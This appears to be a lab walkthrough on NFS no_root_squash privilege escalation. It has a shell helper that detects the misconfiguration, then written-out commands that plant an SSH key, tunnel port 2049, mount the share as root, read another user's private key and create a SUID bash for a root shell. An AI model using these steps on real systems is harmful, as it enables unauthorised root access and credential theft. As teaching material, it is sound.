NFS no_root_squash

Read the /etc/exports file on the target. If a directory is exported with the no_root_squash option, any client that can mount the share can write into it as root, because the server keeps the client's uid 0 instead of mapping it to the anonymous user (the root_squash default).
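A quick way to triage an exports file for this misconfiguration. This is an added example, not code from the original page: a POSIX shell helper, find_no_root_squash, that parses /etc/exports (the test feeds it a constructed sample file) and prints every path/client pair whose option list contains no_root_squash and is not neutralised by all_squash. Comments, several client specs per line, and clients with no option list (which get the root_squash default) are handled; quoted paths with spaces and backslash line continuations are not.

```shell
#!/bin/sh
# Added example (not from the original page): triage an NFS exports file for
# shares that do not squash the client's root user.
#
# For every "path client(options)" entry, print "path client options" when the
# options include no_root_squash.  all_squash maps every client uid, root
# included, to the anonymous user, so it overrides no_root_squash; a later
# root_squash also cancels an earlier no_root_squash.  A client spec with no
# option list gets the exportfs default, which is root_squash.
find_no_root_squash() {
    exports_file="${1:-/etc/exports}"
    # drop comments (from # to end of line); awk then skips blank lines
    sed -e 's/#.*//' "$exports_file" | awk '
        NF == 0 { next }
        {
            path = $1
            for (i = 2; i <= NF; i++) {
                spec = $i
                client = spec
                opts = ""
                # split "client(opt,opt)" into the client and its option list
                if (match(spec, /\(.*\)$/)) {
                    client = substr(spec, 1, RSTART - 1)
                    opts = substr(spec, RSTART + 1, RLENGTH - 2)
                }
                n = split(opts, o, ",")
                unsquashed = 0
                for (j = 1; j <= n; j++) {
                    if (o[j] == "no_root_squash") unsquashed = 1
                    if (o[j] == "root_squash") unsquashed = 0
                    if (o[j] == "all_squash") { unsquashed = 0; break }
                }
                if (unsquashed) print path, client, opts
            }
        }'
}
```

Run it on the target (for example over the SSH session you already have) with find_no_root_squash /etc/exports; showmount -e from the attacking box lists the exported paths but not their options, so the file itself is what tells you whether root is squashed.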

This is done with a simple SSH tunnel. We generate an SSH key pair on our own machine and place the public key in the authorized_keys file of an account we already control on the victim, so that we can open the tunnel without a password. An authorized key in SSH is a public key that grants login to the account whose ~/.ssh/authorized_keys file contains it.

no_root_squash: this option lets the root user on an NFS client act as root on the files of the exported directory, instead of being mapped to the unprivileged anonymous user. That has serious security implications whenever an attacker can reach the share. Here we already have access as paradox (an unprivileged user) and want to escalate to james, whose home directory is exported with no_root_squash.

To exploit this option, we first generate an SSH key pair on our local system (ssh-keygen).

Next we place our public key in the account we already control on the victim. The user's name is paradox. Appending with >> keeps any key that is already there; overwriting someone else's authorized_keys with > is noisy and may lock out a legitimate user.

echo "key value" >> ~/.ssh/authorized_keys

cat ~/.ssh/authorized_keys

Now we tunnel traffic from our local port 3049 to port 2049 (NFS) on the victim, so that we can mount the victim's share on our local machine. Without the tunnel this is not possible: port 2049 is not reachable from our machine, but it is reachable from localhost on the victim, where we have SSH access as paradox. Nothing about this step requires james; the tunnel only carries the NFS traffic, and the root access comes from no_root_squash on the export.

ssh -fN -L 3049:localhost:2049 paradox@10.10.195.53

Now we mount the share on a local directory, which becomes the endpoint from which we operate on the victim's files. The mount must be done as local root, because it is the client's uid 0 that the server will honour.

mkdir /tmp/share

sudo mount -t nfs -o port=3049 localhost:/ /tmp/share

-o specifies mount options, in this case the port, which is 3049 (the local end of the tunnel). Mounting the pseudo-root / over a single port means NFSv4; an NFSv3 export would also need the separate mountd port forwarded.

cd /tmp/share

From now on, whatever we do inside /tmp/share happens on the NFS share at the victim's end, as root.

Observe how /tmp/share now contains james's home directory, including his .ssh directory and private key. Because our local root is not squashed, we can read the key, and we use it to log in over SSH. We are now james.

Thus we have successfully escalated to james.

BONUS: we can copy any executable into this directory as local root, set the SUID bit on it, and execute it on the victim's end to get a root shell, like this:

On our local /tmp/share mount, working as root, we copy a bash binary in (here named stef) so that it is owned by uid 0 on the server, and set the SUID bit on it (chmod u+s). Two caveats: the copied binary must be built for the victim (a local /bin/bash may fail there with a mismatched libc, in which case copy the victim's own /bin/bash instead), and the filesystem holding the export on the server must not be mounted nosuid.

Finally, the SUID bit makes the kernel start the program with the owner's effective uid, root. Bash by default drops that effective uid back to the real uid; the -p (privileged) flag tells it not to, so running ./stef -p as james gives a root shell. Easy.
